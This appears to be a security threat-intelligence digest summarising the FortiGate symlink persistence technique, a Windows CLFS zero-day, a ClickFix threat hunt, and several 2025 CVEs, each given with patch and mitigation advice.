Fortinet has identified a technique used by threat actors to retain unauthorized, read-only access to previously compromised FortiGate VPN devices even after the initial access vector was patched.  The attackers are believed to have leveraged known and now-patched security flaws, including, but not limited to, CVE-2022-42475, CVE-2023-27997, and CVE-2024-21762. The attackers inserted a symbolic link (symlink) that connects the user file system to the root file system. This symlink was placed in a directory tied to the SSL-VPN language file function, allowing persistent access without triggering alerts.  To counter the issue, Fortinet has implemented targeted updates across FortiOS versions, including automated removal of the symlink through detection rules and changes to the SSL-VPN interface to prevent similar abuses.

• FortiOS 7.4, 7.2, 7.0, 6.4: The symbolic link was flagged as malicious by the AV/IPS engine so that it would be automatically removed if the engine was licensed and enabled.
• FortiOS 7.6.2, 7.4.7, 7.2.11 & 7.0.17, 6.4.16: Upgrading to this release will remove the malicious symbolic link.
• FortiOS 7.6.2, 7.4.7, 7.2.11 & 7.0.17, 6.4.16: The SSL-VPN UI has been modified to prevent the serving of such malicious symbolic links.

Organizations that manage their own devices are advised to immediately upgrade their FortiGate firewalls to the latest version of FortiOS (7.6.2, 7.4.7, 7.2.11, 7.0.17, 6.4.16) to detect and remove symbolic links and ensure the SSL-VPN only serves the expected files.The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has issued an advisory of its own, urging users to reset exposed credentials and consider disabling SSL-VPN functionality until the patches can be applied.

Threat Hunting

Summary: Microsoft Threat Intelligence Center (MSTIC) and Microsoft Security Response Center (MSRC) have discovered post-compromise exploitation of a zero-day elevation of privilege vulnerability in the Windows Common Log File System (CLFS) against a number of targets. The targets include organizations in the information technology (IT) and real estate sectors of the United States, the financial sector in Venezuela, a Spanish software company, and the retail sector in Saudi Arabia. Microsoft released security updates to address the vulnerability, tracked as CVE-2025-29824.

Threat Hunt: Alternate ClickFix Methods
Date: 4/15/2025

Log Dependencies: SentinelOne, Crowdstrike, Carbon Black

Summary: As ClickFix rises in popularity, attackers are becoming more creative in their ways of exploiting the user. ClickFix attacks are designed as CAPTCHAs in order to manipulate the user to verify themselves by running commands on their device. Your typical CAPTCHA will only request input such as reading a colorful string of different sizes and fonts into a text box, or clicking squares of required objects (traffic lights, buses, stairs, bicycles, etc.), moving a puzzle piece into place. CAPTCHAs will never ask you to run a command on your system or outside of its browser’s web page. This hunt searches for indications of command-line activity involving this social engineering technique.

• CVE-2025-29927 – Next.js is a React framework for building full-stack web applications. Prior to 14.2.25 and 15.2.3, it is possible to bypass authorization checks within a Next.js application, if the authorization check occurs in middleware. If patching to a safe version is infeasible, it is recommended that you prevent external user requests which contain the x-middleware-subrequest header from reaching your Next.js application. This vulnerability is fixed in 14.2.25 and 15.2.3.
• CVE-2025-0282 – A stack-based buffer overflow in Ivanti Connect Secure before version 22.7R2.5, Ivanti Policy Secure before version 22.7R1.2, and Ivanti Neurons for ZTA gateways before version 22.7R2.3 allows a remote unauthenticated attacker to achieve remote code execution.
• CVE-2025-24813 – Path Equivalence: ‘file.Name’ (Internal Dot) leading to Remote Code Execution and/or Information disclosure and/or malicious content added to uploaded files via write enabled Default Servlet in Apache Tomcat. This issue affects Apache Tomcat: from 11.0.0-M1 through 11.0.2, from 10.1.0-M1 through 10.1.34, from 9.0.0.M1 through 9.0.98. If all of the following were true, a malicious user was able to view security sensitive files and/or inject content into those files: – writes enabled for the default servlet (disabled by default) – support for partial PUT (enabled by default) – a target URL for security sensitive uploads that was a sub-directory of a target URL for public uploads – attacker knowledge of the names of security sensitive files being uploaded – the security sensitive files also being uploaded via partial PUT If all of the following were true, a malicious user was able to perform remote code execution: – writes enabled for the default servlet (disabled by default) – support for partial PUT (enabled by default) – application was using Tomcat’s file based session persistence with the default storage location – application included a library that may be leveraged in a deserialization attack Users are recommended to upgrade to version 11.0.3, 10.1.35 or 9.0.99, which fixes the issue.
• CVE-2025-1974 – A security issue was discovered in Kubernetes where under certain conditions, an unauthenticated attacker with access to the pod network can achieve arbitrary code execution in the context of the ingress-nginx controller. This can lead to disclosure of Secrets accessible to the controller. (Note that in the default installation, the controller can access all Secrets cluster-wide.)
• CVE-2025-0411 – 7-Zip Mark-of-the-Web Bypass Vulnerability. This vulnerability allows remote attackers to bypass the Mark-of-the-Web protection mechanism on affected installations of 7-Zip. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the handling of archived files. When extracting files from a crafted archive that bears the Mark-of-the-Web, 7-Zip does not propagate the Mark-of-the-Web to the extracted files. An attacker can leverage this vulnerability to execute arbitrary code in the context of the current user.